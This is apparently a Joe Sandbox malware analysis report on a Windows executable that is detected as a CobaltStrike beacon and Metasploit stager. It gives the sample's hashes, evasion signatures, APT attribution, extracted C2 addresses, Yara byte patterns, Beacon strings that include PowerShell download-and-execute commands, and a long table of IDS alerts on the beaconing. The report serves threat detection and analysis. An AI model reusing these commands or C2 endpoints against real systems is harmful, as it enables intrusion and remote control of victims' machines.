Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
k2vUsu5VZ5.exe

Overview

General Information

Sample name:k2vUsu5VZ5.exe
renamed because original name is a hash value
Original sample name:591c92301d93d233f0ab70817db96afd.exe
Analysis ID:1586891
MD5:591c92301d93d233f0ab70817db96afd
SHA1:4294d763f3c0a84235627893f1b377632e7a3ef6
SHA256:18c3b8d894afcee5e215753507d812be492fec2d7bcde4a9b2c461fa60b63464
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • k2vUsu5VZ5.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\k2vUsu5VZ5.exe" MD5: 591C92301D93D233F0AB70817DB96AFD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://7.121.190.121:81/r9dN", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/r9dN"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        Click to see the 28 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
          0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
            • 0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
            • 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
            • 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
            • 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
            • 0x30d6f:$a11: Could not open service control manager on %s: %d
            • 0x312a1:$a12: %d is an x64 process (can't inject x86 content)
            • 0x312d1:$a13: %d is an x86 process (can't inject x64 content)
            • 0x315f2:$a14: Failed to impersonate logged on user %d (%u)
            • 0x3125a:$a15: could not create remote thread in %d: %d
            • 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x31208:$a17: could not write to process memory: %d
            • 0x30da0:$a18: Could not create service %s on %s: %d
            • 0x30e29:$a19: Could not delete service %s on %s: %d
            • 0x30c89:$a20: Could not open process token: %d (%u)
            0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
            • 0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            0.2.k2vUsu5VZ5.exe.3880000.1.raw.unpackWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
            • 0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
            Click to see the 20 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T18:26:58.692172+010020337131Targeted Malicious Activity was Detected192.168.2.44973147.121.190.12181TCP
            2025-01-09T18:26:59.801721+010020337131Targeted Malicious Activity was Detected192.168.2.44973247.121.190.12181TCP
            2025-01-09T18:27:00.855914+010020337131Targeted Malicious Activity was Detected192.168.2.44973347.121.190.12181TCP
            2025-01-09T18:27:01.997813+010020337131Targeted Malicious Activity was Detected192.168.2.44973447.121.190.12181TCP
            2025-01-09T18:27:03.326121+010020337131Targeted Malicious Activity was Detected192.168.2.44973547.121.190.12181TCP
            2025-01-09T18:27:04.460605+010020337131Targeted Malicious Activity was Detected192.168.2.44973647.121.190.12181TCP
            2025-01-09T18:27:05.551918+010020337131Targeted Malicious Activity was Detected192.168.2.44973747.121.190.12181TCP
            2025-01-09T18:27:06.645910+010020337131Targeted Malicious Activity was Detected192.168.2.44973847.121.190.12181TCP
            2025-01-09T18:27:07.726797+010020337131Targeted Malicious Activity was Detected192.168.2.44973947.121.190.12181TCP
            2025-01-09T18:27:08.807204+010020337131Targeted Malicious Activity was Detected192.168.2.44974047.121.190.12181TCP
            2025-01-09T18:27:09.902843+010020337131Targeted Malicious Activity was Detected192.168.2.44974147.121.190.12181TCP
            2025-01-09T18:27:11.005653+010020337131Targeted Malicious Activity was Detected192.168.2.44974247.121.190.12181TCP
            2025-01-09T18:27:12.090675+010020337131Targeted Malicious Activity was Detected192.168.2.44974347.121.190.12181TCP
            2025-01-09T18:27:13.200363+010020337131Targeted Malicious Activity was Detected192.168.2.44974647.121.190.12181TCP
            2025-01-09T18:27:14.316726+010020337131Targeted Malicious Activity was Detected192.168.2.44974947.121.190.12181TCP
            2025-01-09T18:27:15.420079+010020337131Targeted Malicious Activity was Detected192.168.2.44975147.121.190.12181TCP
            2025-01-09T18:27:16.468586+010020337131Targeted Malicious Activity was Detected192.168.2.44975347.121.190.12181TCP
            2025-01-09T18:27:17.793772+010020337131Targeted Malicious Activity was Detected192.168.2.44975447.121.190.12181TCP
            2025-01-09T18:27:19.000349+010020337131Targeted Malicious Activity was Detected192.168.2.44975547.121.190.12181TCP
            2025-01-09T18:27:20.074841+010020337131Targeted Malicious Activity was Detected192.168.2.44975647.121.190.12181TCP
            2025-01-09T18:27:21.138262+010020337131Targeted Malicious Activity was Detected192.168.2.44975747.121.190.12181TCP
            2025-01-09T18:27:22.209134+010020337131Targeted Malicious Activity was Detected192.168.2.44975847.121.190.12181TCP
            2025-01-09T18:27:23.270108+010020337131Targeted Malicious Activity was Detected192.168.2.44975947.121.190.12181TCP
            2025-01-09T18:27:24.458531+010020337131Targeted Malicious Activity was Detected192.168.2.44976047.121.190.12181TCP
            2025-01-09T18:27:25.510055+010020337131Targeted Malicious Activity was Detected192.168.2.44976147.121.190.12181TCP
            2025-01-09T18:27:26.690591+010020337131Targeted Malicious Activity was Detected192.168.2.44976247.121.190.12181TCP
            2025-01-09T18:27:27.760710+010020337131Targeted Malicious Activity was Detected192.168.2.44976347.121.190.12181TCP
            2025-01-09T18:27:28.944820+010020337131Targeted Malicious Activity was Detected192.168.2.44976447.121.190.12181TCP
            2025-01-09T18:27:30.022566+010020337131Targeted Malicious Activity was Detected192.168.2.44976547.121.190.12181TCP
            2025-01-09T18:27:31.133799+010020337131Targeted Malicious Activity was Detected192.168.2.44976647.121.190.12181TCP
            2025-01-09T18:27:32.193149+010020337131Targeted Malicious Activity was Detected192.168.2.44976747.121.190.12181TCP
            2025-01-09T18:27:33.245394+010020337131Targeted Malicious Activity was Detected192.168.2.44976847.121.190.12181TCP
            2025-01-09T18:27:34.335835+010020337131Targeted Malicious Activity was Detected192.168.2.44976947.121.190.12181TCP
            2025-01-09T18:27:35.858787+010020337131Targeted Malicious Activity was Detected192.168.2.44977047.121.190.12181TCP
            2025-01-09T18:27:36.989465+010020337131Targeted Malicious Activity was Detected192.168.2.44977147.121.190.12181TCP
            2025-01-09T18:27:38.061812+010020337131Targeted Malicious Activity was Detected192.168.2.44977247.121.190.12181TCP
            2025-01-09T18:27:39.150378+010020337131Targeted Malicious Activity was Detected192.168.2.44977347.121.190.12181TCP
            2025-01-09T18:27:40.326537+010020337131Targeted Malicious Activity was Detected192.168.2.44977447.121.190.12181TCP
            2025-01-09T18:27:41.578354+010020337131Targeted Malicious Activity was Detected192.168.2.44977547.121.190.12181TCP
            2025-01-09T18:27:42.676808+010020337131Targeted Malicious Activity was Detected192.168.2.44977647.121.190.12181TCP
            2025-01-09T18:27:43.851699+010020337131Targeted Malicious Activity was Detected192.168.2.44977747.121.190.12181TCP
            2025-01-09T18:27:45.015487+010020337131Targeted Malicious Activity was Detected192.168.2.44977847.121.190.12181TCP
            2025-01-09T18:27:46.156206+010020337131Targeted Malicious Activity was Detected192.168.2.44977947.121.190.12181TCP
            2025-01-09T18:27:47.259326+010020337131Targeted Malicious Activity was Detected192.168.2.44978047.121.190.12181TCP
            2025-01-09T18:27:48.475014+010020337131Targeted Malicious Activity was Detected192.168.2.44978147.121.190.12181TCP
            2025-01-09T18:27:49.569382+010020337131Targeted Malicious Activity was Detected192.168.2.44978247.121.190.12181TCP
            2025-01-09T18:27:50.687332+010020337131Targeted Malicious Activity was Detected192.168.2.44978347.121.190.12181TCP
            2025-01-09T18:27:51.896072+010020337131Targeted Malicious Activity was Detected192.168.2.44978547.121.190.12181TCP
            2025-01-09T18:27:53.001148+010020337131Targeted Malicious Activity was Detected192.168.2.44978647.121.190.12181TCP
            2025-01-09T18:27:54.063851+010020337131Targeted Malicious Activity was Detected192.168.2.44978747.121.190.12181TCP
            2025-01-09T18:27:55.153573+010020337131Targeted Malicious Activity was Detected192.168.2.44978947.121.190.12181TCP
            2025-01-09T18:27:56.241630+010020337131Targeted Malicious Activity was Detected192.168.2.44979547.121.190.12181TCP
            2025-01-09T18:27:57.316932+010020337131Targeted Malicious Activity was Detected192.168.2.44980147.121.190.12181TCP
            2025-01-09T18:27:58.396016+010020337131Targeted Malicious Activity was Detected192.168.2.44980747.121.190.12181TCP
            2025-01-09T18:27:59.623871+010020337131Targeted Malicious Activity was Detected192.168.2.44981847.121.190.12181TCP
            2025-01-09T18:28:00.692848+010020337131Targeted Malicious Activity was Detected192.168.2.44982447.121.190.12181TCP
            2025-01-09T18:28:01.758776+010020337131Targeted Malicious Activity was Detected192.168.2.44983047.121.190.12181TCP
            2025-01-09T18:28:02.810822+010020337131Targeted Malicious Activity was Detected192.168.2.44983747.121.190.12181TCP
            2025-01-09T18:28:03.988212+010020337131Targeted Malicious Activity was Detected192.168.2.44984147.121.190.12181TCP
            2025-01-09T18:28:05.321293+010020337131Targeted Malicious Activity was Detected192.168.2.44984947.121.190.12181TCP
            2025-01-09T18:28:06.413300+010020337131Targeted Malicious Activity was Detected192.168.2.44985647.121.190.12181TCP
            2025-01-09T18:28:07.532474+010020337131Targeted Malicious Activity was Detected192.168.2.44986347.121.190.12181TCP
            2025-01-09T18:28:08.601795+010020337131Targeted Malicious Activity was Detected192.168.2.44987347.121.190.12181TCP
            2025-01-09T18:28:09.788651+010020337131Targeted Malicious Activity was Detected192.168.2.44987947.121.190.12181TCP
            2025-01-09T18:28:10.873173+010020337131Targeted Malicious Activity was Detected192.168.2.44988647.121.190.12181TCP
            2025-01-09T18:28:11.954819+010020337131Targeted Malicious Activity was Detected192.168.2.44989347.121.190.12181TCP
            2025-01-09T18:28:13.119522+010020337131Targeted Malicious Activity was Detected192.168.2.44990247.121.190.12181TCP
            2025-01-09T18:28:14.195020+010020337131Targeted Malicious Activity was Detected192.168.2.44990947.121.190.12181TCP
            2025-01-09T18:28:15.252536+010020337131Targeted Malicious Activity was Detected192.168.2.44991647.121.190.12181TCP
            2025-01-09T18:28:16.440191+010020337131Targeted Malicious Activity was Detected192.168.2.44992647.121.190.12181TCP
            2025-01-09T18:28:17.615109+010020337131Targeted Malicious Activity was Detected192.168.2.44993247.121.190.12181TCP
            2025-01-09T18:28:18.709015+010020337131Targeted Malicious Activity was Detected192.168.2.44993947.121.190.12181TCP
            2025-01-09T18:28:19.801526+010020337131Targeted Malicious Activity was Detected192.168.2.44994847.121.190.12181TCP
            2025-01-09T18:28:20.911426+010020337131Targeted Malicious Activity was Detected192.168.2.44995547.121.190.12181TCP
            2025-01-09T18:28:22.022760+010020337131Targeted Malicious Activity was Detected192.168.2.44996347.121.190.12181TCP
            2025-01-09T18:28:23.167905+010020337131Targeted Malicious Activity was Detected192.168.2.44997147.121.190.12181TCP
            2025-01-09T18:28:24.294644+010020337131Targeted Malicious Activity was Detected192.168.2.44997847.121.190.12181TCP
            2025-01-09T18:28:25.658522+010020337131Targeted Malicious Activity was Detected192.168.2.44998847.121.190.12181TCP
            2025-01-09T18:28:27.021503+010020337131Targeted Malicious Activity was Detected192.168.2.44999647.121.190.12181TCP
            2025-01-09T18:28:28.241166+010020337131Targeted Malicious Activity was Detected192.168.2.45000547.121.190.12181TCP
            2025-01-09T18:28:29.362326+010020337131Targeted Malicious Activity was Detected192.168.2.45001247.121.190.12181TCP
            2025-01-09T18:28:30.463976+010020337131Targeted Malicious Activity was Detected192.168.2.45002047.121.190.12181TCP
            2025-01-09T18:28:31.677591+010020337131Targeted Malicious Activity was Detected192.168.2.45002847.121.190.12181TCP
            2025-01-09T18:28:32.803069+010020337131Targeted Malicious Activity was Detected192.168.2.45003547.121.190.12181TCP
            2025-01-09T18:28:34.118497+010020337131Targeted Malicious Activity was Detected192.168.2.45004247.121.190.12181TCP
            2025-01-09T18:28:35.329669+010020337131Targeted Malicious Activity was Detected192.168.2.45005147.121.190.12181TCP
            2025-01-09T18:28:36.564411+010020337131Targeted Malicious Activity was Detected192.168.2.45006047.121.190.12181TCP
            2025-01-09T18:28:37.695923+010020337131Targeted Malicious Activity was Detected192.168.2.45006847.121.190.12181TCP
            2025-01-09T18:28:38.964116+010020337131Targeted Malicious Activity was Detected192.168.2.45007647.121.190.12181TCP
            2025-01-09T18:28:40.162304+010020337131Targeted Malicious Activity was Detected192.168.2.45008347.121.190.12181TCP
            2025-01-09T18:28:41.263355+010020337131Targeted Malicious Activity was Detected192.168.2.45009347.121.190.12181TCP
            2025-01-09T18:28:42.358095+010020337131Targeted Malicious Activity was Detected192.168.2.45009447.121.190.12181TCP
            2025-01-09T18:28:43.525495+010020337131Targeted Malicious Activity was Detected192.168.2.45009547.121.190.12181TCP
            2025-01-09T18:28:44.677076+010020337131Targeted Malicious Activity was Detected192.168.2.45009647.121.190.12181TCP
            2025-01-09T18:28:45.743348+010020337131Targeted Malicious Activity was Detected192.168.2.45009747.121.190.12181TCP
            2025-01-09T18:28:47.011567+010020337131Targeted Malicious Activity was Detected192.168.2.45009847.121.190.12181TCP
            2025-01-09T18:28:48.148338+010020337131Targeted Malicious Activity was Detected192.168.2.45009947.121.190.12181TCP
            2025-01-09T18:28:49.318041+010020337131Targeted Malicious Activity was Detected192.168.2.45010047.121.190.12181TCP
            2025-01-09T18:28:53.196032+010020337131Targeted Malicious Activity was Detected192.168.2.45010147.121.190.12181TCP
            2025-01-09T18:28:54.443585+010020337131Targeted Malicious Activity was Detected192.168.2.45010247.121.190.12181TCP
            2025-01-09T18:28:55.532889+010020337131Targeted Malicious Activity was Detected192.168.2.45010347.121.190.12181TCP
            2025-01-09T18:28:56.750899+010020337131Targeted Malicious Activity was Detected192.168.2.45010447.121.190.12181TCP
            2025-01-09T18:28:58.599679+010020337131Targeted Malicious Activity was Detected192.168.2.45010547.121.190.12181TCP
            2025-01-09T18:28:59.666420+010020337131Targeted Malicious Activity was Detected192.168.2.45010647.121.190.12181TCP
            2025-01-09T18:29:00.744551+010020337131Targeted Malicious Activity was Detected192.168.2.45010747.121.190.12181TCP
            2025-01-09T18:29:01.823055+010020337131Targeted Malicious Activity was Detected192.168.2.45010847.121.190.12181TCP
            2025-01-09T18:29:02.995926+010020337131Targeted Malicious Activity was Detected192.168.2.45010947.121.190.12181TCP
            2025-01-09T18:29:04.080078+010020337131Targeted Malicious Activity was Detected192.168.2.45011047.121.190.12181TCP
            2025-01-09T18:29:05.166988+010020337131Targeted Malicious Activity was Detected192.168.2.45011147.121.190.12181TCP
            2025-01-09T18:29:06.251262+010020337131Targeted Malicious Activity was Detected192.168.2.45011247.121.190.12181TCP
            2025-01-09T18:29:07.331183+010020337131Targeted Malicious Activity was Detected192.168.2.45011347.121.190.12181TCP
            2025-01-09T18:29:11.448450+010020337131Targeted Malicious Activity was Detected192.168.2.45011447.121.190.12181TCP
            2025-01-09T18:29:12.553700+010020337131Targeted Malicious Activity was Detected192.168.2.45011547.121.190.12181TCP
            2025-01-09T18:29:13.620777+010020337131Targeted Malicious Activity was Detected192.168.2.45011647.121.190.12181TCP
            2025-01-09T18:29:14.720364+010020337131Targeted Malicious Activity was Detected192.168.2.45011747.121.190.12181TCP
            2025-01-09T18:29:15.814631+010020337131Targeted Malicious Activity was Detected192.168.2.45011847.121.190.12181TCP
            2025-01-09T18:29:16.894578+010020337131Targeted Malicious Activity was Detected192.168.2.45011947.121.190.12181TCP
            2025-01-09T18:29:18.004943+010020337131Targeted Malicious Activity was Detected192.168.2.45012047.121.190.12181TCP
            2025-01-09T18:29:19.163464+010020337131Targeted Malicious Activity was Detected192.168.2.45012147.121.190.12181TCP
            2025-01-09T18:29:20.243981+010020337131Targeted Malicious Activity was Detected192.168.2.45012247.121.190.12181TCP
            2025-01-09T18:29:21.320990+010020337131Targeted Malicious Activity was Detected192.168.2.45012347.121.190.12181TCP
            2025-01-09T18:29:22.513789+010020337131Targeted Malicious Activity was Detected192.168.2.45012447.121.190.12181TCP
            2025-01-09T18:29:23.620517+010020337131Targeted Malicious Activity was Detected192.168.2.45012547.121.190.12181TCP
            2025-01-09T18:29:24.674356+010020337131Targeted Malicious Activity was Detected192.168.2.45012647.121.190.12181TCP
            2025-01-09T18:29:25.756463+010020337131Targeted Malicious Activity was Detected192.168.2.45012747.121.190.12181TCP
            2025-01-09T18:29:26.891494+010020337131Targeted Malicious Activity was Detected192.168.2.45012847.121.190.12181TCP
            2025-01-09T18:29:27.972287+010020337131Targeted Malicious Activity was Detected192.168.2.45012947.121.190.12181TCP
            2025-01-09T18:29:29.079978+010020337131Targeted Malicious Activity was Detected192.168.2.45013047.121.190.12181TCP
            2025-01-09T18:29:30.159900+010020337131Targeted Malicious Activity was Detected192.168.2.45013147.121.190.12181TCP
            2025-01-09T18:29:31.218459+010020337131Targeted Malicious Activity was Detected192.168.2.45013247.121.190.12181TCP
            2025-01-09T18:29:32.268197+010020337131Targeted Malicious Activity was Detected192.168.2.45013347.121.190.12181TCP
            2025-01-09T18:29:33.362693+010020337131Targeted Malicious Activity was Detected192.168.2.45013447.121.190.12181TCP
            2025-01-09T18:29:34.426477+010020337131Targeted Malicious Activity was Detected192.168.2.45013547.121.190.12181TCP
            2025-01-09T18:29:35.527009+010020337131Targeted Malicious Activity was Detected192.168.2.45013647.121.190.12181TCP
            2025-01-09T18:29:36.597921+010020337131Targeted Malicious Activity was Detected192.168.2.45013747.121.190.12181TCP
            2025-01-09T18:29:37.679996+010020337131Targeted Malicious Activity was Detected192.168.2.45013847.121.190.12181TCP
            2025-01-09T18:29:38.792279+010020337131Targeted Malicious Activity was Detected192.168.2.45013947.121.190.12181TCP
            2025-01-09T18:29:39.875549+010020337131Targeted Malicious Activity was Detected192.168.2.45014047.121.190.12181TCP
            2025-01-09T18:29:40.951468+010020337131Targeted Malicious Activity was Detected192.168.2.45014147.121.190.12181TCP
            2025-01-09T18:29:42.114723+010020337131Targeted Malicious Activity was Detected192.168.2.45014247.121.190.12181TCP
            2025-01-09T18:29:43.187368+010020337131Targeted Malicious Activity was Detected192.168.2.45014347.121.190.12181TCP
            2025-01-09T18:29:44.313392+010020337131Targeted Malicious Activity was Detected192.168.2.45014447.121.190.12181TCP
            2025-01-09T18:29:45.383729+010020337131Targeted Malicious Activity was Detected192.168.2.45014547.121.190.12181TCP
            2025-01-09T18:29:46.458244+010020337131Targeted Malicious Activity was Detected192.168.2.45014647.121.190.12181TCP
            2025-01-09T18:29:47.592806+010020337131Targeted Malicious Activity was Detected192.168.2.45014747.121.190.12181TCP
            2025-01-09T18:29:48.720814+010020337131Targeted Malicious Activity was Detected192.168.2.45014847.121.190.12181TCP
            2025-01-09T18:29:49.991351+010020337131Targeted Malicious Activity was Detected192.168.2.45014947.121.190.12181TCP
            2025-01-09T18:29:51.069004+010020337131Targeted Malicious Activity was Detected192.168.2.45015047.121.190.12181TCP
            2025-01-09T18:29:52.315201+010020337131Targeted Malicious Activity was Detected192.168.2.45015147.121.190.12181TCP
            2025-01-09T18:29:53.503849+010020337131Targeted Malicious Activity was Detected192.168.2.45015247.121.190.12181TCP
            2025-01-09T18:29:54.625500+010020337131Targeted Malicious Activity was Detected192.168.2.45015347.121.190.12181TCP
            2025-01-09T18:29:55.680921+010020337131Targeted Malicious Activity was Detected192.168.2.45015447.121.190.12181TCP
            2025-01-09T18:29:56.792110+010020337131Targeted Malicious Activity was Detected192.168.2.45015547.121.190.12181TCP
            2025-01-09T18:29:57.908553+010020337131Targeted Malicious Activity was Detected192.168.2.45015647.121.190.12181TCP
            2025-01-09T18:29:58.994612+010020337131Targeted Malicious Activity was Detected192.168.2.45015747.121.190.12181TCP
            2025-01-09T18:30:00.108835+010020337131Targeted Malicious Activity was Detected192.168.2.45015847.121.190.12181TCP
            2025-01-09T18:30:01.238085+010020337131Targeted Malicious Activity was Detected192.168.2.45015947.121.190.12181TCP
            2025-01-09T18:30:02.453187+010020337131Targeted Malicious Activity was Detected192.168.2.45016047.121.190.12181TCP
            2025-01-09T18:30:03.576251+010020337131Targeted Malicious Activity was Detected192.168.2.45016147.121.190.12181TCP
            2025-01-09T18:30:04.720300+010020337131Targeted Malicious Activity was Detected192.168.2.45016247.121.190.12181TCP
            2025-01-09T18:30:05.842542+010020337131Targeted Malicious Activity was Detected192.168.2.45016347.121.190.12181TCP
            2025-01-09T18:30:06.953021+010020337131Targeted Malicious Activity was Detected192.168.2.45016447.121.190.12181TCP
            2025-01-09T18:30:08.063446+010020337131Targeted Malicious Activity was Detected192.168.2.45016547.121.190.12181TCP
            2025-01-09T18:30:09.223628+010020337131Targeted Malicious Activity was Detected192.168.2.45016647.121.190.12181TCP
            2025-01-09T18:30:10.422309+010020337131Targeted Malicious Activity was Detected192.168.2.45016747.121.190.12181TCP
            2025-01-09T18:30:11.471504+010020337131Targeted Malicious Activity was Detected192.168.2.45016847.121.190.12181TCP
            2025-01-09T18:30:12.603222+010020337131Targeted Malicious Activity was Detected192.168.2.45016947.121.190.12181TCP
            2025-01-09T18:30:13.714908+010020337131Targeted Malicious Activity was Detected192.168.2.45017047.121.190.12181TCP
            2025-01-09T18:30:14.883346+010020337131Targeted Malicious Activity was Detected192.168.2.45017147.121.190.12181TCP
            2025-01-09T18:30:15.954476+010020337131Targeted Malicious Activity was Detected192.168.2.45017247.121.190.12181TCP
            2025-01-09T18:30:17.230496+010020337131Targeted Malicious Activity was Detected192.168.2.45017347.121.190.12181TCP
            2025-01-09T18:30:18.516571+010020337131Targeted Malicious Activity was Detected192.168.2.45017447.121.190.12181TCP
            2025-01-09T18:30:19.617254+010020337131Targeted Malicious Activity was Detected192.168.2.45017547.121.190.12181TCP
            2025-01-09T18:30:20.726961+010020337131Targeted Malicious Activity was Detected192.168.2.45017647.121.190.12181TCP
            2025-01-09T18:30:21.817039+010020337131Targeted Malicious Activity was Detected192.168.2.45017747.121.190.12181TCP
            2025-01-09T18:30:23.091262+010020337131Targeted Malicious Activity was Detected192.168.2.45017847.121.190.12181TCP
            2025-01-09T18:30:24.177429+010020337131Targeted Malicious Activity was Detected192.168.2.45017947.121.190.12181TCP
            2025-01-09T18:30:25.241232+010020337131Targeted Malicious Activity was Detected192.168.2.45018047.121.190.12181TCP
            2025-01-09T18:30:26.323869+010020337131Targeted Malicious Activity was Detected192.168.2.45018147.121.190.12181TCP
            2025-01-09T18:30:27.415421+010020337131Targeted Malicious Activity was Detected192.168.2.45018247.121.190.12181TCP
            2025-01-09T18:30:28.539661+010020337131Targeted Malicious Activity was Detected192.168.2.45018347.121.190.12181TCP
            2025-01-09T18:30:29.649944+010020337131Targeted Malicious Activity was Detected192.168.2.45018447.121.190.12181TCP
            2025-01-09T18:30:31.720027+010020337131Targeted Malicious Activity was Detected192.168.2.45018547.121.190.12181TCP
            2025-01-09T18:30:32.989155+010020337131Targeted Malicious Activity was Detected192.168.2.45018647.121.190.12181TCP
            2025-01-09T18:30:34.222278+010020337131Targeted Malicious Activity was Detected192.168.2.45018747.121.190.12181TCP
            2025-01-09T18:30:35.373951+010020337131Targeted Malicious Activity was Detected192.168.2.45018847.121.190.12181TCP
            2025-01-09T18:30:36.463834+010020337131Targeted Malicious Activity was Detected192.168.2.45018947.121.190.12181TCP
            2025-01-09T18:30:37.552334+010020337131Targeted Malicious Activity was Detected192.168.2.45019047.121.190.12181TCP
            2025-01-09T18:30:38.653219+010020337131Targeted Malicious Activity was Detected192.168.2.45019147.121.190.12181TCP
            2025-01-09T18:30:39.779238+010020337131Targeted Malicious Activity was Detected192.168.2.45019247.121.190.12181TCP
            2025-01-09T18:30:40.921946+010020337131Targeted Malicious Activity was Detected192.168.2.45019347.121.190.12181TCP
            2025-01-09T18:30:41.996996+010020337131Targeted Malicious Activity was Detected192.168.2.45019447.121.190.12181TCP
